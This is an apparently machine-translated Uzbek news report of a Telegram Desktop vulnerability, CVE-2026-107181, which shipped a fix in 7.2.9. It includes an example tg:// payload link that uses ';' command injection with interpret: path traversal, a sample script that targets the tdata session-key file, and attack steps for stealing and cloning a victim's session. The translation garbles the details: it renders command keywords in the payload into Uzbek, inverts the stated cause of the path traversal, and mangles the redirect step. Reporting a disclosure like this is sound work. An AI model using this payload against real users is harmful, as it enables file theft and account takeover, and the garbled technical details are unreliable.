Telegram Desktop’dagi zaiflik havolani bosish orqali ixtiyoriy fayllarni yuborish imkonini beradi.

Rasmiy Telegram ish stoli mijozi Telegram Desktop’dagi zaiflik (CVE-2026-107181) tafsilotlari va ulardan foydalanish usullari oshkor qilindi. Muammo IPC buyruqlaridagi qochib qutula olmagan ajratuvchi belgilarni noto‘g‘ri ishlatish natijasida yuzaga kelgan. Bu umumiy havolani bosish orqali jabrlanuvchining tizimidan tajovuzkorga har qanday fayllarni, jumladan, Telegram akkauntini o‘g‘irlash uchun ishlatilishi mumkin bo‘lgan sessiya kalitlarini o‘z ichiga olgan fayllarni uzatish imkonini berdi. Zaiflik Telegram Desktop 7.2.9’da tuzatildi.

"tg://" havolalarini bosganingizda, operatsion tizim ushbu turdagi havola bilan bog'liq Telegram Desktop ilovasini ishga tushiradi. Agar ushbu ilovaning boshqa namunasi tizimda allaqachon ishlayotgan bo'lsa, ishlayotgan jarayon IPC interfeysi yordamida soket orqali havolani unga uzatadi. Muammo shundaki, agar siz havola parametrlari orasida ";" belgisini qo'shsangiz (masalan, "tg://x?a=1;OPEN…"), tarkib bo'linadi va ";" belgisidan keyingi qismlar alohida buyruqlar sifatida qayta ishlanadi.

Hujum OPEN buyrug'idan va "interpret:" URI sxemasidan foydalanadi, bu IPC orqali xizmat skriptlarini ishga tushirish uchun mo'ljallangan bo'lib, ular yangi nashrlarni avtomatik ravishda kanallarga yuborish uchun ishlatiladi. Skript - bu kanalga yuboriladigan faylni va kanal identifikatorini belgilaydigan oldindan belgilangan mahalliy fayl. Skriptlarga fayl yo'li xizmat pastki katalogiga nisbatan qayta ishlanadi, ammo fayl yo'llarida "../" yo'qligi sababli, tajovuzkor asosiy katalogdan tashqarida saqlangan fayllarga kirishi mumkin. Masalan, ular faylni o'zlarining Telegram guruhiga yuklashlari va keyin quyidagi kabi havola yaratish orqali uni skript sifatida ko'rsatishlari mumkin:

tg://x?a=1;OCHISH:talqin qilish:../../../Downloads/Telegram%20Desktop/instructions.txt

Hujum bosqichlari:

  • Hujumchi jabrlanuvchini oʻz guruhiga qoʻshadi (standart sozlamalar bilan, jabrlanuvchini qoʻshish qoʻshilayotgan shaxsdan tasdiqlashni talab qilmaydi) va kanal va skriptga yoʻlni oʻz ichiga olgan matnli faylni guruhga yuboradi. Jabrlanuvchi guruhga qoʻshilganda Telegram ushbu faylni oldindan belgilangan tizim pastki katalogiga saqlaydi.

    kanal: 2005234537
    file: tdata/D877F783D5D3EF8Cs

  • Hujumchi jabrlanuvchiga o'z xostiga begunoh ko'rinadigan havolani yuboradi (masalan, "https://coolsite.org"), u yo'naltirish orqali ochilganda server Hujumchining URI manzili 'tg://x?a=1;OPEN:interpret:…;OPEN:interpret:…. shaklidagi URI bilan almashtirildi.
  • Havola bosilganda, brauzer "tg://" URI ishlov beruvchisini chaqiradi, bu esa yuqorida aytib o'tilgan buyruqlarni bajarish zanjirini ishga tushiradi, natijada fayllar hech qanday bildirishnoma ko'rsatmasdan yoki yuborishni tasdiqlashni so'ramasdan hujumchining kanaliga yuboriladi.
  • Shifrlash va avtorizatsiya kalitlarini o'z ichiga olgan tdata pastki katalogidan fayllarni olgan va foydalanuvchi tomonidan o'rnatilgan mahalliy parol bo'lmagan taqdirda, tajovuzkor jabrlanuvchining ulanish sessiyasini o'z qurilmasida klonlashi mumkin.

Manba: opennet.ru

DDoS himoyasi, VPS VDS serverlari bo'lgan saytlar uchun ishonchli hosting sotib oling 🔥 DDoS himoyasi, VPS VDS serverlari bilan ishonchli veb-sayt xostingini sotib oling | ProHoster